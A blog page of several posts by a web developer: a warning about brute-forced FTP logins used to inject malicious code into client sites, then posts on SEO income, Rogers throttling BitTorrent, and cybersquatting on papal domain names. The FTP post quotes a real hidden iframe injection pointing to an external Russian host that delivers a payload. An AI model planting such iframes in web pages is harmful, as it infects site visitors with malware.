Brute Force FTP Password Hacking On The Rise
September 15, 2009 by Marko · Leave a Comment
I know of at least six websites that I provide support for that have had malicious code embedded into their web pages in the last few months. The common entry point for the hackers in all of these cases has been FTP login. Each site had simple username/password combinations and hence were fairly easy to get into. It seems that the hackers are using an automated script to insert their code as I’ve found that every single file with the filename containing the words “index” or “default” gets modified, regardless of the extension (whether .htm, .html, .php, .asp, etc…) and whether it’s a file that is actually even linked to or not.
Commonly, an invisible iframe like the following gets inserted after the <body> tag or then at the very end of the file.
<iframe src=”http://3e0.ru:8080/index.php” width=160 height=188 style=”visibility: hidden”></iframe>
The file on the remote site then delivers the real payload. Sometimes javascript code is inserted instead of an iframe. Again, the javascript code loads an external javascript file which contains the real payload.
If your clients haven’t made recent backups you will need to either manually remove the offending code snippets or then create a script to do it for you (if many files are affected). If you leave the code in place or don’t remove it quickly enough, the site will end up getting on Googles black list. Browsers like Firefox will then not show the site and instead put up a big red warning page. IE will continue to show the hacked pages and is probably the target of the malicious code in the first place. If your site does get black listed you will need to go request a re-scan from Google.
The easiest way to avoid this hack is just to make sure all your (and your clients) passwords are not overly simple. The password “password” is not a good choice while “fuMrHack8″ is.
Easy Money
September 13, 2009 by Marko · Leave a Comment
Easy Money
Date: 2006-05-01 (transfered from old blog)
If you’ve spent any considerable amount of time on the Internet, you’ve probably tried making money on it. I basically make all my income from working on the Internet, specifically by programming the back-ends to client websites. As you may or may not know, most of my type of work is being outsourced to India and other low-wage countries, usually leaving people such as myself having to work more for less. This is were the lure of “easy money” comes in as I have been researching internet marketing and search engine optimatizaion techniques. These are hardly new concepts anymore and I may be a bit late to the game but I think I’ll be giving it a go. I understand that there is no such thing as “easy money” but for someone such as myself who lives on the Internet and knows all the related technologies, the work should not be very hard and perhaps a bit enjoyable. The work basically entails driving web traffic to sites that contain affiliate ads or pay-per-click ads. I have a number of websites I’ve created in the past just for fun but have never really tried to promote or monetize them. I will initially be concentrating on Desktop Linux At Home, Southern Ontario Day Trips and Cropping News. I am also going to be partnering with someone else trying to do some environmental affiliate sales sites.
Easy Money… one year later
Date: 2007-05-01 (transfered from old blog)
My experimentation with SEO ran out of steam about 4 months into it… but I did still manage to triple the income from the 3 sites I was concentrating on. The problem is that that is not saying much, as the sites were initially making very little to begin with. My advice, unless you are in a current hot niche market with your websites and are ready to commit a lot of effort into your SEO, don’t quit your day job.
If you are interested in trying out SEO and ad marketing, I would recommend reading the forums daily at DigitalPoint.com.
Rogers Sucks!
September 13, 2009 by Marko · Leave a Comment
Why I think Rogers sucks
Date: 2005-12-09 (transfered from old blog)
I have been a subscriber to Rogers High Speed Internet service since 1998, having toughed it out through a lot of good and bad times with them. But in the last year service has really gotten bad. Internet access cuts in and out frequently… and it’s not just my computer, network card or router as I always have a glance at the cable modem sitting on a desk beside me and see that the CABLE LED light has gone out. Besides this, I use software called Bittorrent quite often. It is useful for downloading large files, specifically media and Linux distributions. For a fast Internet connection, bittorrent has always been noticable slow. I never really questioned it much and accepted it. About a month ago, my bittorrents stopped working altogether. I could not get it to even make initial contact with a tracker (if you use bittorrent, you’ll know what this means). So I call up Rogers support and ask if they are blocking bittorrent traffic. The guy says “Umm, no, our bittorrents are running fine here”, meaning the guy at least knew what I was talking about as he uses the software himself seemingly. Anyway, I started researching this on the Internet and found that Rogers does in fact throttle bittorrent packets on their network. And possibly is doing rolling black-outs of bittorrent traffic on certain IP blocks, which is probably what I was experiencing. Then last week I hear that they are discontinuing Usenet service. While I’m not a heavy Usenet user, I was alarmed at all the services that they are slowly eliminating. So, I started my quest for looking into some other broadband Internet provider and ended up switching to a small local ISP (sentex.ca) who has been in business for a long time and I’ve heard good things about them from friends. Yay, everything works again! And it’s fast! And cheaper than Rogers!
Now let me tell you how my Rogers cancellation call proceeded….
Rogers Agent: “I see you’ve been a customer for a long time, may I ask why you are leaving us?”
Me: “Well, my bittorrent software doesn’t work very well with your service… among other problems.”
RA: “I don’t know anything about this bittorrent, do you mind if I go ask someone and get back to you in a minute?”
Me: “Umm, OK. (waits on hold for 5 minutes)”
RA: “Ok, they’ve explained the situation to me. Yes, we do throttle bittorrent traffic because it slows down the Internet for everyone else.”
Me: “But you advertise 60G bandwidth up/down per month”
RA: “Yes, and I see that you don’t even use half of that amount”
Me: “I know, and you’re saying I shouldn’t even be using what I am using?”
RA: “No, you can use it, it’s just that this bittorrent slows down the connections for everyone”
Me: “So, you are saying we can have 60G up/down as long as it’s only email and web traffic?”
RA: “No, you can use whatever you like”
Me: “But I can’t, since you throttle bittorrent… I mean really Rogers doesn’t want users like me. Rogers wants people that will only ever use email and surf the web.”
RA: “Well, bittorrent slows down everybody elses connection, so it isn’t fair to the other users.”
Me: “Well maybe Rogers should lower their bandwidth caps to not give the false impression that you might actually be able to use that amount!”
RA: “But you can use it”
on and on it went…
Anyway, long story short, Rogers wants only users who will stick to email and web. Basically, users that have zero chance of using more than about 1% of their perceived 60G bandwidth limit. I guess if people using Rogers started somehow automating their browser to continually hit random sites all day, they would have to start throttling and possibly blocking web traffic too!
Oh well, if they don’t want me or other power users, that’s fine. Bye-bye Rogers!
Cybersquatting For The Pope
September 13, 2009 by Marko · Leave a Comment
Cybersquatting
Date: 2005-04-20 (transfered from old blog)
Some clever fellow who followed the prophecies of St. Malachy registered the domain benedictxvi.com before the new pope was elected and is now getting tons of hits to his website (and probably making a nice profit with google ads). I went to check out if any variations on that domain were still available but could find nothing. Even misspellings, such as benedictvxi.com and benedictxiv.com, are already taken. Then I looked for the “last pope” and found PeterII.com and all variations already taken also… even the latin petrusromanus.com. Getting a good cybersquatting domain name is extremely difficult these days.